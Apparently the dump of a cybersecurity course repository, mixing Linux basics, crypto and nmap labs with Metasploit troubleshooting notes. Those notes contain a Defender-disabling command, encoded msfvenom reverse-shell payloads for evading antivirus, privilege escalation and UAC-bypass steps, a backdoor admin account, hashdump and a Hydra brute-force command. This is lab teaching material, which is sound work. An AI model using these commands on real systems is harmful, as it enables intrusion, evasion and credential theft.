```text
├── shell_week
│   ├── weekly_task.md
│   ├── shell_log_rotation_recoder.md
│   ├── shell.md
│   ├── weekly_audit_report.md
│   └── os_hardening_bash.md
├── projects
│   ├── nmap_post.md
│   ├── potential_issues.md
│   ├── permission_task.md
│   ├── post_exploitation_5.md
│   ├── logs_files.md
│   ├── phishing-task.md
│   ├── new_linux_task.md
│   ├── post-exploitation-research.md
│   ├── fiver_siem_guide.md
│   ├── sniffing-network.md
│   ├── permission-ownership.md
│   ├── vnc_task.md
│   ├── stegganography.md
│   ├── mimikaz_projects.md
│   ├── steghide-task.md
│   ├── steghide-guide.md
│   ├── new2_task.md
│   ├── post_exploitation_4.md
│   ├── challenge-3.md
│   ├── new_johntherepper.md
│   ├── post-exploitation.md
│   ├── Post-exploitation-task.md
│   ├── exploiting_sql_injection.md
│   ├── metasploit_network_cap.md
│   ├── auto_qlinjection.md
│   ├── dvwa_low.md
│   ├── network_analysis.md
│   └── malware.md
├── week1
│   ├── day2_basics.md
│   ├── day3_mv.md
│   ├── key_enc_dec.md
│   ├── day_1.md
│   ├── day4_delete.md
│   ├── keypair.md
│   ├── manually_calculate_hash_value.md
│   ├── day5_FHS.md
│   ├── crypto_project.md
│   └── cryptgraphic.md
├── README.md
├── nmap-task.md
├── troubleshooting
│   ├── meterpreter-error.md
│   ├── admin-permission.md
│   └── windows-payloads.md
├── network-sniffing.md
├── week3
│   ├── command_help.md
│   ├── env_variable.md
│   ├── path_shell.md
│   ├── redirect_shell.md
│   ├── shell_basics.md
│   ├── super_user.md
│   └── day2_report.md
├── week2
│   ├── day6_ip_roting.md
│   ├── day5_dhcp.md
│   ├── day7_dns.md
│   ├── day1_networking.md
│   ├── day4_ethernet_arp.md
│   ├── day3_subnetting.md
│   ├── day2_tcp.md
│   ├── day9_ssh.md
│   ├── day8_netlify.md
│   └── day10_file_transfer.md
└── Ransomware-Project(groupC).md
```

/shell_week/weekly_task.md:
--------------------------------------------------------------------------------
### Weekly Audit Report Generator
#### Goal: Run scheduled scans and save logs to /var/log/security-audit.log

##### Tasks:

* Check open ports (ss, netstat, nmap)
* Users with UID 0
* SUID/SGID files
* Print summary report
--------------------------------------------------------------------------------
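The four tasks above as a bash script, added here as an example (it is not the repository's own weekly audit script): it assumes `ss` or `netstat` for the port check, takes the passwd file and search root as parameters so it can be run against test data, and appends to the log path named in the goal when invoked with `run`.

```bash
#!/usr/bin/env bash
# Weekly security audit (added example, not the repository's own script).
# Checks: listening ports, UID-0 accounts, SUID/SGID files, then a summary.
# Usage: sudo ./weekly_audit.sh run        (appends to $LOGFILE)
set -u

# Log path from the task goal; override with AUDIT_LOG for testing.
LOGFILE="${AUDIT_LOG:-/var/log/security-audit.log}"

# All accounts with UID 0 in a passwd-format file ($1, default /etc/passwd).
uid0_users() {
    awk -F: '$3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# UID-0 accounts other than root: any output here is a finding, because a
# second superuser is a classic persistence trick. Empty output means clean.
extra_uid0_users() {
    uid0_users "${1:-/etc/passwd}" | grep -vx root || true
}

# Regular files below $1 with the setuid (4000) or setgid (2000) bit set.
# -xdev keeps the walk on one filesystem so /proc and network mounts are skipped.
suid_sgid_files() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Listening TCP/UDP sockets as "proto local-address" lines.
# Prefers ss (iproute2), falls back to netstat, and degrades to a note
# rather than failing when neither tool is installed.
listening_ports() {
    if command -v ss >/dev/null 2>&1; then
        ss -Hlntu 2>/dev/null | awk '{ print $1, $5 }'
    elif command -v netstat >/dev/null 2>&1; then
        netstat -lntu 2>/dev/null | awk 'NR > 2 { print $1, $4 }'
    else
        echo "neither ss nor netstat available"
    fi
}

# Count non-empty lines in a string (grep -c prints 0 for empty input).
count_lines() {
    printf '%s' "$1" | grep -c .
}

# Build one report: $1 = passwd file, $2 = root directory for the SUID search.
audit_report() {
    local passwd="${1:-/etc/passwd}" root="${2:-/}"
    local extra suid
    extra=$(extra_uid0_users "$passwd")
    suid=$(suid_sgid_files "$root")

    printf '=== security audit %s on %s ===\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(uname -n)"
    printf -- '--- listening ports ---\n'
    listening_ports
    printf -- '--- UID 0 accounts ---\n'
    uid0_users "$passwd"
    printf -- '--- SUID/SGID files under %s ---\n' "$root"
    printf '%s\n' "$suid"
    printf -- '--- summary ---\n'
    printf 'unexpected UID-0 accounts: %s\n' "$(count_lines "$extra")"
    printf 'SUID/SGID files: %s\n' "$(count_lines "$suid")"
}

# Append a full-system report to the log; schedule it weekly from cron, e.g.
#   0 3 * * 0  /usr/local/sbin/weekly_audit.sh run
main() {
    audit_report /etc/passwd / >> "$LOGFILE"
}

# Only run the audit when explicitly asked, so the file can be sourced for tests.
if [ "${1:-}" = "run" ]; then
    main
fi
```

Compare successive reports with `diff` so a new SUID binary or UID-0 account stands out as a change rather than one line among hundreds.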
/projects/nmap_post.md:
--------------------------------------------------------------------------------
## Practical: Installing a Service & Detecting It with Nmap

### Step 1 — Install an SMTP Service on Linux

### Step 2 — Verify the service is running

### Step 3 — Detect the running SMTP service with nmap

### Step 4 — Service Version Detection

##### Reference:
- Command to install the service
- Command to update kali
- nmap command
--------------------------------------------------------------------------------
/week1/day2_basics.md:
--------------------------------------------------------------------------------
## Linux Navigation Basics: Basic Commands

Linux Navigation Basics is about using simple commands to move around and manage files on your computer.
For example, `cd` lets you go into different folders, `ls` shows you what files and folders are inside, and `pwd` tells you where you are
currently. These commands help you easily find and organize your files.

# Change directory
```bash
cd /path/to/directory
```

# List files and directories in the current directory
```bash
ls
```

# View the current working directory
```bash
pwd
```
# Display the manual page for a command
```bash
man ls
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
---

# Everything Linux

Welcome to **Everything Linux** – your go-to repository for learning, mastering, and exploring all things Linux! This repository is dedicated to providing a comprehensive collection of resources, tutorials, and tips for anyone working with Linux, whether you're a beginner or an advanced user.

### What’s Inside:

- **Basic Commands**: A collection of essential Linux commands and how to use them.
- **File System Hierarchy**: Understanding the structure of the Linux file system.
- **Scripting and Automation**: Bash scripts, tips, and tricks to automate tasks.
- **Linux Tools**: Guide to useful Linux utilities and software.
- **System Administration**: Tutorials for managing and configuring Linux systems.
- **Security and Networking**: Resources for securing your Linux environment and network configuration.

### Contribute:
Feel free to open issues, submit pull requests, and share your own experiences and insights! Let’s make this the ultimate Linux resource for everyone.

### Author: Ephraim C. Norbert

---

--------------------------------------------------------------------------------
/shell_week/shell_log_rotation_recoder.md:
--------------------------------------------------------------------------------
### **Difference Between Log Rotation and Recorder**

| Feature | **Log Rotation** | **Recorder** |
|---------------|----------------|-------------|
| **Purpose** | Manages and organizes log files | Continuously records data (logs, audio, video, etc.) |
| **Functionality** | Moves old logs, renames them, and deletes old files | Captures and stores data for future use |
| **Trigger Mechanism** | Happens based on file size, time, or manual execution | Runs continuously or on demand |
| **Output** | Archived log files with timestamps | A live or stored record of events |
| **Use Case** | Prevents logs from growing too large and consuming disk space | Keeps a record of events for monitoring or analysis |
| **Example** | `logrotate` in Linux, moving logs to an archive folder | A security camera recording video or a script logging network activity |

---

### **How They Work in Your Case**
- **Log Rotation:** In your Bash script, logs are moved to an archive and cleaned up after 30 days. This prevents unlimited log growth.
- **Recorder:** Your script is also **recording** log entries from a named pipe (`PIPENAME`) and writing them to a log file.

In short:
- **A script acts as a recorder** because it continuously writes logs.
- **The log rotation function manages recorded logs** to keep storage clean.
--------------------------------------------------------------------------------
/nmap-task.md:
--------------------------------------------------------------------------------
## **Project: Network Scanning and Vulnerability Detection with Nmap**

### **Objective**:
Use `nmap` to perform reconnaissance and vulnerability scanning on a vulnerable machine (Metasploitable2).

### **Lab Setup**:
- **Target**: Metasploitable2 (download it first; VM on VirtualBox/VMware)
- **Attacker**: Kali Linux or Parrot OS (VM or physical machine)
- **Network**: Host-only Adapter or NAT Network (to isolate traffic from the real internet)

### **Tasks & Steps**:

### **1. Host Discovery**
> Use `nmap` to discover the target’s IP address.

```bash
nmap -sn 192.168.56.0/24
```

### **2. Basic Port Scan**
> Discover open ports and services.

```bash
nmap -sS -Pn -v 192.168.56.X
```

### **3. Service and Version Detection**

```bash
nmap -sV 192.168.56.X
```


### **4. OS Detection**

```bash
nmap -O 192.168.56.X
```

### **5. Aggressive Scan (All-in-One)**

```bash
nmap -A 192.168.56.X
```

### **6. Vulnerability Script Scan**
> Use built-in `nmap` NSE scripts to find known vulnerabilities.

```bash
nmap --script vuln 192.168.56.X
```

- MS08-067
- Anonymous FTP access
- Open Samba shares
- Shellshock or Heartbleed*

### **7. Output to File (for reports)**

```bash
nmap -A -oN scan_results.txt 192.168.56.X
```
--------------------------------------------------------------------------------
/projects/potential_issues.md:
--------------------------------------------------------------------------------
### **Potential Issues & Fixes**

#### **1. Check the target URL path**
- The test site `testphp.vulnweb.com` requires an actual login path.
- Try `"/login.php:username=^USER^&password=^PASS^:Invalid username or password"` instead of just `"/"`.

#### **2. Verify the failure message**
- The failure message you provided (`"Invalid username or password"`) must match exactly what the website returns when login fails.
- Use **Burp Suite** or **Developer Tools (F12 → Network → Response)** to check the actual error message.

#### **3. Check if the site blocks brute-force attempts**
- Some websites have rate-limiting or CAPTCHA after multiple failed logins.
- You may need to adjust the request timing using `-t 1` (one request at a time) or use `-f` to stop on the first valid login.

#### **4. Ensure Hydra is installed properly**
Run:
```bash
hydra -h
```
If Hydra isn’t installed, install it using:
```bash
sudo apt install hydra -y  # For Debian-based systems
```

#### **5. Correct the output file path**
- The output directory must exist before running the command. Run:
```bash
mkdir -p ~/project
```

---

### **Fixed Hydra Command:**
```bash
hydra -L ~/project/usernames.txt -P ~/project/500-worst-passwords.txt testphp.vulnweb.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password" -o ~/project/hydra_results.txt -t 1
```

### **Optional Enhancements:**
- If the login form has additional hidden fields (like a CSRF token), you'll need to extract them dynamically.
- Add `-V` for verbose output to debug what’s happening.
--------------------------------------------------------------------------------
/projects/permission_task.md:
--------------------------------------------------------------------------------
### 📝 **Task: File Permission Mastery**

**Objective:** Learn how to manage and apply file permissions using `chmod`.

#### Setup:

1. Open your terminal.
2. Create a new directory called `permissions_lab`.
3. Inside it, create three files: `script.sh`, `report.txt`, and `data.db`.

```bash
mkdir permissions_lab
cd permissions_lab
touch script.sh report.txt data.db
```

#### Task Instructions:

1. **Initial Permissions Check:**

   * Use `ls -l` to list the permissions of all files.
   * Write down or screenshot the output.

2. **Assign Permissions:**

   * Give full permissions (read, write, execute) to all users for `script.sh` using **numeric mode**.
   * Give read and write permissions to the **owner**, read-only to the **group**, and no permissions to **others** for `report.txt` using **symbolic mode**.
   * Remove all permissions from `data.db`.

3. **Commands to Use:**

   * `chmod 777 script.sh`
   * `chmod u=rw,g=r,o= report.txt`
   * `chmod 000 data.db`

4. **Verification:**

   * Run `ls -l` again to confirm the permission changes.
   * Note any differences and explain what each set of permissions means.

5. **Bonus (Challenge):**

   * Create a subdirectory `testdir` inside `permissions_lab`.
   * Set full permissions on `testdir` **recursively** (for the folder and its contents).
   * Command hint: `chmod -R 777 testdir`


### Questions:

1. What does the number 7 represent in `chmod 777`?
2. Why is it dangerous to give full permissions to all users on a script?
3. What happens when you try to open `data.db` after removing all permissions?
--------------------------------------------------------------------------------
/projects/post_exploitation_5.md:
--------------------------------------------------------------------------------
## **Lab Assignment: Exploiting MS08-067 with Metasploit**

### **Objective**
Use Metasploit to exploit the **MS08-067 NetAPI vulnerability** on a vulnerable Windows 7 machine and gain a Meterpreter shell.



### **Steps**

**1. Lab Setup**

* Ensure you have:

  * **Kali Linux (attacker machine)** with `msfconsole` installed.
  * **Windows 7 vulnerable VM** (unpatched, with vulnerable `netapi32.dll`).
* Use **Host-Only Network** or **NAT Network** in VirtualBox/VMware for isolation.
* Confirm attacker and victim VMs are on the same network (`ifconfig` / `ipconfig`).



**2. Verify the Target is Alive**
On Kali, run:




**3. Scan the Target with Nmap**
Check if SMB (port 445) is open:



If port **445/tcp open** → the target is vulnerable to SMB exploits.



**4. Start Metasploit**




**5. Load the Exploit Module**

```bash
ms08_067_netapi
```


**6. Configure the Target (Victim)**





**7. Configure the Payload**
Choose a reverse shell payload:




**8. Launch the Exploit**

```bash
exploit
```

If successful, you’ll get a **Meterpreter session**.


**9. Post-Exploitation Activities**
Inside the Meterpreter shell, try:

```bash
sysinfo      # Check system details
getuid       # Get current user
hashdump     # Dump password hashes (if allowed)
screenshot   # Take a screenshot of the victim’s desktop
```


**10. Reporting Requirement**
Each student should submit a short **lab report** containing:

* Screenshot of **Nmap scan results** (port 445 open).
* Screenshot of **msfconsole running the exploit**.
* Screenshot of **Meterpreter session** (`sysinfo` or `getuid`).
* A reflection: *“Why was MS08-067 such a critical vulnerability?”*

--------------------------------------------------------------------------------
/troubleshooting/meterpreter-error.md:
--------------------------------------------------------------------------------
If your Meterpreter session keeps closing after execution, there are several potential reasons and fixes you can try:

### 1. **Check if the Payload is Being Blocked**
- **Windows Defender/Antivirus:** Modern Windows security features detect and kill Meterpreter payloads quickly.
  **Fix:** Disable Defender or add exclusions:
```
powershell -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
```
- **Firewall:** Ensure Windows Firewall is not blocking the connection.

### 2. **Try a Different Payload Encoding**
- `shikata_ga_nai` is often flagged by AV. Try adding more layers of encoding:
```
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -i 5 -b "\x00" LHOST=10.0.2.42 -f exe > Desktop/Exploit.exe
```
Increase the iterations (`-i 5`) to make it harder to detect.

### 3. **Use a Staged Payload**
If the payload is crashing immediately, try using a staged payload (`windows/meterpreter/reverse_tcp`) instead of a stageless one (`windows/meterpreter_reverse_tcp`):
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.42 LPORT=4444 -f exe > Exploit.exe
```

### 4. **Use an Alternative Listener Configuration**
Set up your Metasploit listener with:
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.42
set LPORT 4444
set ExitOnSession false
exploit -j
```

### 5. **Run Payload in Compatibility Mode**
On the target machine, try running `Exploit.exe` in **compatibility mode (Windows 7)** and with **admin privileges**.

### 6. **Check for Session Timeouts**
- Ensure your `session-timed-out` value isn't too low:
```
set AutoRunScript post/windows/manage/migrate
```

### 7. **Use a Different Payload Format**
Instead of `.exe`, try encoding into a different format, like PowerShell or DLL:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.42 LPORT=4444 -f psh-cmd > exploit.ps1
```
--------------------------------------------------------------------------------
/network-sniffing.md:
--------------------------------------------------------------------------------
# Webdeves Ethical Hacking Final Project (Team Red)

## **Project Title: Packet Sniffer & Analyzer**

### **Objective**:
Build a Python-based **packet sniffer** that captures, analyzes, and logs network traffic to help identify suspicious activity and learn how attackers spy on or manipulate data in transit.

### **Core Features**:

1. **Packet Capture**:
   - Use `scapy` or `pyshark` to sniff packets in real time.
   - Capture Ethernet, ARP, IP, TCP, UDP, and HTTP traffic.

2. **Protocol Analyzer**:
   - Parse and print packet details (source, destination, protocol, payload).
   - Detect unencrypted credentials (like HTTP Basic Auth).
   - Highlight common reconnaissance activity (e.g., ping sweeps, port scans).

3. **Suspicious Activity Detection**:
   - Flag:
     - DNS Tunneling
     - ARP Spoofing
     - Port scanning attempts
     - MITM indicators

4. **Logging & Exporting**:
   - Save captured traffic to `.pcap` or `.csv`.
   - Allow filtering by protocol or IP.
   - Timestamped logs for forensic replay.

5. **Bonus Features (Advanced)**:
   - Live dashboard with graphs (Flask + Chart.js).
   - PCAP file upload and offline analysis.
   - Alert system for detected anomalies.

### **Tools & Libraries**:
- `scapy` – low-level packet crafting/sniffing
- `pyshark` – wrapper around tshark for deep packet parsing
- `socket` – IP-level network interactions
- `pandas` – traffic log analysis
- `matplotlib` or `Plotly` – for visualizations


### **Setup Instructions**:
- Run in a **controlled lab network** (e.g., Kali + Metasploitable or DVWA).
- Capture only local subnet traffic.
- Teach how to filter with `Wireshark` and compare with the tool’s output.


### **Deliverables**:
- Fully documented Python source
- Interface or CLI for capturing and analyzing
- Exportable PCAP/CSV logs
- Sample attack detection outputs
- Report explaining packet structure and threats

### **Real-World Impact**:
- Deep understanding of **network layers and protocols**
- Foundation for IDS/IPS systems
- Insight into how **hackers and defenders use packet sniffing**
- Creates a springboard for projects like:
  - Intrusion detection systems
  - MITM simulators
  - Network forensics tools
--------------------------------------------------------------------------------
/week1/day3_mv.md:
--------------------------------------------------------------------------------
### Moving Files in Linux

The **`mv`** command is one of the most frequently used commands in Linux. It allows you to:

1. **Move files or directories** from one location to another.
2. **Rename files or directories** by moving them to the same location with a new name.

---

### **Syntax**
```bash
mv [options] source destination
```
- **`source`**: The file or directory you want to move.
- **`destination`**: The target location or new name for the file/directory.

---

### **Examples**

#### 1. **Moving Files**
Move a file to a different directory.
```bash
mv file1.txt /home/user/Documents/
```
After running this, `file1.txt` will now be located in the `/home/user/Documents` directory.

#### 2. **Renaming Files**
Rename a file by "moving" it to the same location with a new name.
```bash
mv oldname.txt newname.txt
```
This renames `oldname.txt` to `newname.txt`.

#### 3. **Moving Directories**
Move an entire directory and its contents.
```bash
mv /home/user/old_folder /home/user/new_folder
```
If `new_folder` does not exist yet, this renames `old_folder`; if it already exists, `old_folder` is moved inside it.

#### 4. **Overwrite Confirmation**
By default, the `mv` command overwrites files without asking. To get a confirmation prompt before overwriting:
```bash
mv -i file1.txt /home/user/Documents/
```

#### 5. **Move Multiple Files**
You can move multiple files to a directory in one command.
```bash
mv file1.txt file2.txt /home/user/Documents/
```

---

### **Options**
- **`-i` (interactive):** Prompts you before overwriting an existing file.
  ```bash
  mv -i file1.txt /home/user/Documents/
  ```
- **`-n` (no-clobber):** Prevents overwriting existing files.
  ```bash
  mv -n file1.txt /home/user/Documents/
  ```
- **`-v` (verbose):** Displays details about what is being moved.
  ```bash
  mv -v file1.txt /home/user/Documents/
  ```

---

### **Tips**
- Always double-check the source and destination paths to avoid accidentally overwriting or misplacing files.
- Combine with `ls` to verify files in the target directory after moving:
  ```bash
  ls /home/user/Documents/
  ```

---

By mastering the `mv` command, you can efficiently organize, relocate, and rename files or directories, making it a vital tool in your Linux workflow!
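The recorder-plus-rotation pattern described in shell_log_rotation_recoder.md above, as an added bash example rather than that file's own script: the FIFO path, log and archive locations, the `STOP` sentinel and the size trigger are assumptions of this example, and archives older than 30 days are pruned with `find -mtime`.

```bash
#!/usr/bin/env bash
# Named-pipe log recorder with log rotation (added example; the paths, the
# STOP sentinel and the size trigger are assumptions, not the page's script).
# Usage: ./recorder.sh start   -> create the FIFO and record until "STOP" arrives
set -u

PIPENAME="${PIPENAME:-/tmp/recorder.fifo}"
LOGFILE="${LOGFILE:-/tmp/recorder/app.log}"
ARCHIVE_DIR="${ARCHIVE_DIR:-/tmp/recorder/archive}"
RETENTION_DAYS=30
MAX_BYTES="${MAX_BYTES:-1048576}"   # rotate once the live log exceeds 1 MiB

# Rotate: move the live log into the archive under a timestamped name and
# start a fresh empty log. $1 = log file, $2 = archive dir. Prints the
# archived path (nothing if the log was empty) so callers can check it.
rotate_log() {
    local log="$1" archive="$2" stamp dest
    mkdir -p "$archive"
    stamp=$(date -u +%Y%m%d-%H%M%S)
    dest="$archive/$(basename "$log").$stamp"
    if [ -s "$log" ]; then
        mv "$log" "$dest"
        : > "$log"
        printf '%s\n' "$dest"
    fi
}

# Prune: delete archived logs older than $2 days (default RETENTION_DAYS).
# Only plain files directly under the archive dir are considered, so a bad
# ARCHIVE_DIR value cannot turn this into a recursive delete elsewhere.
prune_archive() {
    local archive="$1" days="${2:-$RETENTION_DAYS}"
    find "$archive" -maxdepth 1 -type f -mtime +"$days" -print -delete
}

# Recorder: read lines from the FIFO ($1) and append them, timestamped, to
# the log ($2); rotate into $3 when the log grows past MAX_BYTES.
# Stops when a writer sends the literal line "STOP".
record_from_fifo() {
    local fifo="$1" log="$2" archive="$3" line size
    [ -p "$fifo" ] || mkfifo -m 600 "$fifo"   # owner-only: logs may hold sensitive data
    mkdir -p "$(dirname "$log")"
    # Open read-write so EOF from one writer closing does not end the loop.
    exec 3<>"$fifo"
    while IFS= read -r line <&3; do
        [ "$line" = "STOP" ] && break
        printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$line" >> "$log"
        size=$(wc -c < "$log")
        if [ "$size" -gt "$MAX_BYTES" ]; then
            rotate_log "$log" "$archive" >/dev/null
            prune_archive "$archive" >/dev/null
        fi
    done
    exec 3>&-
}

# Run the recorder only when explicitly asked, so the file can be sourced.
if [ "${1:-}" = "start" ]; then
    record_from_fifo "$PIPENAME" "$LOGFILE" "$ARCHIVE_DIR"
fi
```

Any process can then log with `echo "event text" > /tmp/recorder.fifo`; compress the archived copies in a cron job if disk space matters more than grep speed.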
--------------------------------------------------------------------------------
/projects/logs_files.md:
--------------------------------------------------------------------------------
In **Kali Linux**, log files are primarily stored in the `/var/log/` directory. These logs contain system messages, authentication attempts, package installations, and other critical system events.

### **Common Log File Locations in Kali Linux**
1. **System Logs**
   - `/var/log/syslog` → General system logs, including startup and shutdown messages.
   - `/var/log/dmesg` → Kernel ring buffer messages (useful for hardware diagnostics).
   - `/var/log/kern.log` → Kernel-specific logs.

2. **Authentication & Security Logs**
   - `/var/log/auth.log` → Authentication attempts (SSH logins, sudo usage).
   - `/var/log/faillog` → Failed login attempts.
   - `/var/log/wtmp` → Record of logins, reboots, and shutdowns.
   - `/var/log/btmp` → Failed login attempts (binary format, view using `lastb`).

3. **Package Management Logs**
   - `/var/log/dpkg.log` → Package installation, upgrade, and removal logs (for Debian-based systems like Kali).
   - `/var/log/apt/` → Contains logs related to package installations via APT.

4. **Networking & Firewall Logs**
   - `/var/log/ufw.log` → UFW (Uncomplicated Firewall) logs.
   - `/var/log/nginx/` → Logs for the **NGINX** web server.
   - `/var/log/apache2/` → Logs for the **Apache** web server.
   - `/var/log/samba/` → Samba (SMB) logs.

5. **Cron Jobs & Scheduled Tasks**
   - `/var/log/cron.log` or `/var/log/syslog` → Cron job execution logs.

6. **Xorg (GUI Display Server) Logs**
   - `/var/log/Xorg.0.log` → Logs related to the X Window system.

---

### **How Log Files are Saved**
- **Plain Text Format**: Most logs are stored in **plain text** (e.g., `/var/log/syslog`).
- **Binary Format**: Some logs, like `/var/log/wtmp` and `/var/log/btmp`, are stored in **binary** format and must be read using commands like:
  ```bash
  last -f /var/log/wtmp
  lastb -f /var/log/btmp
  ```
- **Rotated Logs**:
  Logs are **rotated** periodically to prevent excessive disk usage. Log rotation is managed by:
  - `logrotate` (configured in `/etc/logrotate.conf` and `/etc/logrotate.d/`).
  - Older logs are compressed (`.gz`) and stored with timestamps.

---

### **Commands to View Log Files**
- **Tail (Live Logs)**
  ```bash
  tail -f /var/log/syslog
  ```
- **Grep (Search for Specific Entries)**
  ```bash
  grep "error" /var/log/syslog
  ```
- **Journalctl (For Systemd Logs)**
  ```bash
  journalctl -xe
  ```
--------------------------------------------------------------------------------
/troubleshooting/admin-permission.md:
--------------------------------------------------------------------------------
You are getting an **Administrator permission error** because the Meterpreter session is running with **regular user privileges**, meaning you don't have the necessary rights to create a new user or elevate privileges. You need to **escalate privileges** first. Here are some ways to do that:

---

## **1. Check Current Privileges**
First, check if you are running as **SYSTEM or Administrator** in Meterpreter:
```
getuid
```
If it returns a standard user (not SYSTEM or Administrator), you need to escalate.

---

## **2. Try Automatic Privilege Escalation**
Run:
```
use post/windows/escalate/getsystem
run
```
If successful, it should elevate you to **NT AUTHORITY\SYSTEM**.

---

## **3. Migrate to a High-Privilege Process**
If `getsystem` fails, try migrating into a process with **higher privileges**:
1. List running processes:
```
ps
```
2. Find a process owned by **NT AUTHORITY\SYSTEM** (e.g., `winlogon.exe` or `lsass.exe`).
3. Migrate into it:
```
migrate
```
Example:
```
migrate 1234
```
4. Check if you now have SYSTEM privileges:
```
getuid
```

---

## **4. Manually Exploit Privilege Escalation**
If the above methods don’t work, use a **local privilege escalation exploit**.
Try running:
```
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set SESSION 1
exploit
```
If that doesn't work, search for other local privilege escalation exploits:
```
search type:exploit platform:windows local
```
Pick one that fits your OS and run it.

---

## **5. Try Running a UAC Bypass**
If you have admin privileges but **UAC (User Account Control) is blocking** the command, try:
```
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
exploit
```
This works by abusing `fodhelper.exe` to bypass UAC.

---

## **6. Run Commands as SYSTEM**
If you get SYSTEM privileges, you can execute system commands directly:
```
execute -f cmd.exe -i -H
```
Then, try:
```
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add
```
- If `getsystem` or `bypassuac` fails, the system might be patched. Try finding an **exploit for your OS version**.
- Use `sysinfo` to check the Windows version, then search for privilege escalation exploits.
- If UAC is enabled and blocking commands, bypass it using `bypassuac_fodhelper` or another method.
--------------------------------------------------------------------------------
/projects/phishing-task.md:
--------------------------------------------------------------------------------
## Final Project: Human Weakness Exploitation via BeEF & GoPhish
**Theme**: *Simulating Phishing and Post-Click Exploitation*

### **Objectives**

- Design a targeted phishing campaign.
- Capture clicks and interaction data via GoPhish.
- Use BeEF to hook a browser and demonstrate what an attacker could do post-click.
- Create a report + awareness material explaining the attack and how to prevent it.

---

### **Project Steps**

#### 1. Set Up Lab Environment
- Kali Linux with:
  - BeEF installed (`/usr/share/beef-xss`)
  - GoPhish (download from [https://github.com/gophish/gophish](https://github.com/gophish/gophish))
  - Optional: Metasploitable VM or any sandboxed target for realism
- Ensure all testing is done in a **contained environment with full consent**.

---

#### 2. GoPhish Campaign Setup
- Create a **phishing email** with:
  - A believable message (e.g., "Important Update Required")
  - A link to a fake login page or document portal

- Landing page should include the **BeEF hook**:
```html

```

- Start GoPhish, configure your SMTP settings, and launch the campaign.


#### 3. BeEF Exploitation Phase
- Once the user lands on the page, BeEF will show a **hooked browser**.
- Demonstrate basic post-exploitation:
  - Alert box
  - Browser fingerprinting
  - Fake login prompt
  - Webcam prompt (but **do not use** it unless it's your own machine)

#### 4. Metrics to Collect
- Emails sent / opened
- Links clicked
- Hooked sessions in BeEF
- Commands successfully run in BeEF
- Time-to-click stats

#### 5. Awareness & Defense Material
Explain:
- How this attack works
- Red flags to watch for
- Technical and non-technical defenses (e.g., email filtering, user training, browser hardening)


#### 6. Final Report
- Executive Summary
- Attack Simulation Details
- Ethical Boundaries Maintained
- GoPhish Campaign Overview
- BeEF Post-Click Actions
- Defense Recommendations

### Ethics & Rules
- No phishing real users without explicit consent
- No persistence, malware, or real data exfiltration
- All email recipients must be part of the exercise and aware of the simulation either before or immediately after
- Hooked browsers must be student-owned or lab machines


- Integrate a **custom payload** in BeEF
- Bypass a basic email filter or browser security warning (safely)
- Create a **mock SOC alert** based on the campaign
--------------------------------------------------------------------------------
/week1/key_enc_dec.md:
--------------------------------------------------------------------------------
### **🔹 Encrypting & Decrypting Data Using RSA Key Pair**
Once you've generated your **private (`private_key.pem`)** and **public (`public_key.pem`)** keys, you can use them for **secure encryption and decryption**.

---

## **📌 Step 1: Create a Sample Message**
First, create a file with some text to encrypt.
```bash
echo "Hello, this is a secret message!" > message.txt
```

---

## **📌 Step 2: Encrypt the Message Using the Public Key**
We use the **public key** to encrypt the file.
```bash
openssl rsautl -encrypt -pubin -inkey public_key.pem -in message.txt -out encrypted_message.bin
```
✅ **Now, `encrypted_message.bin` contains the encrypted message.**

🔴 **Why use the public key?**
- Anyone can encrypt messages using the **public key**.
- Only the owner of the **private key** can decrypt them.

---

## **📌 Step 3: Decrypt the Message Using the Private Key**
Now, decrypt the file using the **private key**.
```bash
openssl rsautl -decrypt -inkey private_key.pem -in encrypted_message.bin -out decrypted_message.txt
```
✅ **Check the decrypted message:**
```bash
cat decrypted_message.txt
```
Expected output:
```
Hello, this is a secret message!
```

---

## **📌 Step 4: Digitally Sign a File**
A **digital signature** proves that a message came from a trusted source and wasn’t altered.

### **Sign the message with the private key**
```bash
openssl dgst -sha256 -sign private_key.pem -out message.sig message.txt
```
✅ **Now, `message.sig` contains the digital signature.**

---

## **📌 Step 5: Verify the Signature Using the Public Key**
To verify the signature, the recipient uses your **public key**:
```bash
openssl dgst -sha256 -verify public_key.pem -signature message.sig message.txt
```
If valid, OpenSSL will return:
```
Verified OK
```

---

## **📌 Summary of Commands**
| **Action** | **Command** |
|------------|------------|
| Encrypt a message | `openssl rsautl -encrypt -pubin -inkey public_key.pem -in message.txt -out encrypted_message.bin` |
| Decrypt a message | `openssl rsautl -decrypt -inkey private_key.pem -in encrypted_message.bin -out decrypted_message.txt` |
| Sign a message | `openssl dgst -sha256 -sign private_key.pem -out message.sig message.txt` |
| Verify a signature | `openssl dgst -sha256 -verify public_key.pem -signature message.sig message.txt` |

Note: `openssl rsautl` is deprecated from OpenSSL 3.0 onwards; `openssl pkeyutl` performs the same encrypt and decrypt operations with the same `-encrypt`/`-decrypt`, `-pubin` and `-inkey` options. RSA can only encrypt a message shorter than the key, so for anything larger than a short note, encrypt the data with a symmetric key and use RSA only to protect that key.

---

### **📌 Real-World Applications**
- **🔐 Secure file sharing** (encrypt data before sending it).
- **📧 Email encryption (PGP-like security)**.
- **🛡️ Digital signatures for verifying software updates**.
--------------------------------------------------------------------------------
/projects/new_linux_task.md:
--------------------------------------------------------------------------------
## **Beginner Tasks**
1. **Navigation & File Management**
   - Create a directory called `my_project` inside the home folder.
   - Inside `my_project`, create three text files: `file1.txt`, `file2.txt`, and `file3.txt`.
   - Write "Hello World" into `file1.txt` using the `echo` command.
   - Copy `file1.txt` to `file1_backup.txt`.
